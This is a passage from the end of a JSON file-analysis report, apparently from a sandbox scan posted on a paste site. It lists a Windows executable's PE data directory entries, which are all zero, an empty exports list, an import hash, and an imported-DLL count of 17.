  5054. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  5055. "size": "0x00000000"
  5056. },
  5057. {
  5058. "virtual_address": "0x00000000",
  5059. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  5060. "size": "0x00000000"
  5061. },
  5062. {
  5063. "virtual_address": "0x00000000",
  5064. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  5065. "size": "0x00000000"
  5066. },
  5067. {
  5068. "virtual_address": "0x00000000",
  5069. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  5070. "size": "0x00000000"
  5071. },
  5072. {
  5073. "virtual_address": "0x00000000",
  5074. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  5075. "size": "0x00000000"
  5076. },
  5077. {
  5078. "virtual_address": "0x00000000",
  5079. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  5080. "size": "0x00000000"
  5081. }
  5082. ],
  5083. "exports": [],
  5084. "guest_signers": {},
  5085. "imphash": "46116a2f8090728368dbf9ef96584273",
  5086. "icon_fuzzy": null,
  5087. "icon": null,
  5088. "pdbpath": null,
  5089. "imported_dll_count": 17,
  5090. "versioninfo": []
  5091. }
  5092. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement